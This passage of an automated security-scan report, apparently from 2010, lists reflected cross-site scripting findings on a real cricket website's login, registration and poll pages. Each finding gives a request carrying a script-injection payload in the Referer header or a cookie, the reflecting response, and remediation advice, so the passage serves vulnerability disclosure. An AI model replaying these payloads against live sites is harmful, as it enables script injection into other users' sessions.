Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /ci/content/submit/comment/usr_login.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=a22ce"><script>alert(1)</script>99653f53917

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:42 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 1324
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f392d"><script>alert(1)</script>00c65ad03a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:14:52 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148354
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:52
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2">
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86d5"><script>alert(1)</script>3da25da6da3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Referer: http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:19:20 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148472
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:19:20
...[SNIP]...
<input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3">
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4754'-alert(1)-'d4807eabfe9 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaf4754'-alert(1)-'d4807eabfe9; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:39 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148414
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usaf4754'-alert(1)-'d4807eabfe9,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usaf4754'-alert(1)-'d4807eabfe9;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb23"><script>alert(1)</script>73ebe8053a2 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usabbb23"><script>alert(1)</script>73ebe8053a2; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:35 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148489
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usabbb23"><script>alert(1)</scrip
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usabbb23"><script>alert(1)</script>73ebe8053a2;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96c17'-alert(1)-'4cef5e4a3c8 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us96c17'-alert(1)-'4cef5e4a3c8;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:25 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148330
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us96c17'-alert(1)-'4cef5e4a3c8, cluster: usa,
...[SNIP]...
<script language="javascript" type="text/javascript">
ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload e70d8--><script>alert(1)</script>9c7a9f58fdc was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request

GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=use70d8--><script>alert(1)</script>9c7a9f58fdc;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:28 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148362
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: use70d8--><script>alert(1)</script>9c7a9f58fdc, cluster: usa, created: 2010-11-07 03:13:28 -->
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d00"><script>alert(1)</script>f3bf3b3642a was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:29 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 83786
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usaa8d00"><script>alert(1)</scrip
...[SNIP]...
<a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=123456789?" target="_blank">
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9904d'-alert(1)-'218689b8227 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa9904d'-alert(1)-'218689b8227; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:33 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 83531
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa9904d'-alert(1)-'218689b8227,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usa9904d'-alert(1)-'218689b8227;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69125'-alert(1)-'2c7a734ccab was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us69125'-alert(1)-'2c7a734ccab;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:09 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 82875
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us69125'-alert(1)-'2c7a734ccab, cluster: usa,
...[SNIP]...
<script language="javascript" type="text/javascript">
ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload b19ab--><script>alert(1)</script>f7e4260af65 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request

GET /ci/content/submit/poll/cast_vote.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usb19ab--><script>alert(1)</script>f7e4260af65;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:13:12 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 82907
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: usb19ab--><script>alert(1)</script>f7e4260af65, cluster: usa, created: 2010-11-07 03:13:12 -->
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37c2'-alert(1)-'56441d147b1 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usae37c2'-alert(1)-'56441d147b1; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:07 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148532
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usae37c2'-alert(1)-'56441d147b1,
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usae37c2'-alert(1)-'56441d147b1;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript">
...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3dc2"><script>alert(1)</script>9960f224455 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usaf3dc2"><script>alert(1)</script>9960f224455; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:02 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148607
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaf3dc2"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaf3dc2"><script>alert(1)</script>9960f224455;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload 6c213--><script>alert(1)</script>88efb11a633 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6c213--><script>alert(1)</script>88efb11a633;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:56 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148480
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6c213--><script>alert(1)</script>88efb11a633, cluster: usa, created: 2010-11-07 03:17:56 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de31'-alert(1)-'329e617c586 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6de31'-alert(1)-'329e617c586;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148448
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6de31'-alert(1)-'329e617c586, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload e4557--><script>alert(1)</script>390d9742830 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usae4557--><script>alert(1)</script>390d9742830; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:16:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11716
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usae4557--><script>alert(1)</script>390d9742830, created: 2010-11-07 03:16:53 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload f68f3--><script>alert(1)</script>2111aaab520 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usf68f3--><script>alert(1)</script>2111aaab520;
Response
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:09 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11716
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: usf68f3--><script>alert(1)</script>2111aaab520, cluster: usa, created: 2010-11-07 03:17:09 --> ...[SNIP]...
Report generated by Hoyt LLC Research at Sat Nov 13 20:17:55 CST 2010.